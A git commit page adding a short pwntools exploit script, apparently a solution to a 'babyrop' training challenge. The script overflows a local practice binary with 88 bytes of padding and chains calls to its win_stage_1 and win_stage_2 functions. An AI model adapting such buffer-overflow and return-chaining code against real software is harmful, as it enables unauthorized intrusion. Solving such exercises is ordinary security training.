This commit is contained in:
jc
2025-08-05 17:55:58 +03:00
parent e05b881fa7
commit 38ba27e986
9 changed files with 143 additions and 0 deletions
+17
View File
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./babyrop_level_2_1", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*88
buf += p64(target.sym.win_stage_1)
buf += p64(target.sym.win_stage_2)
s(buf)
r.interactive()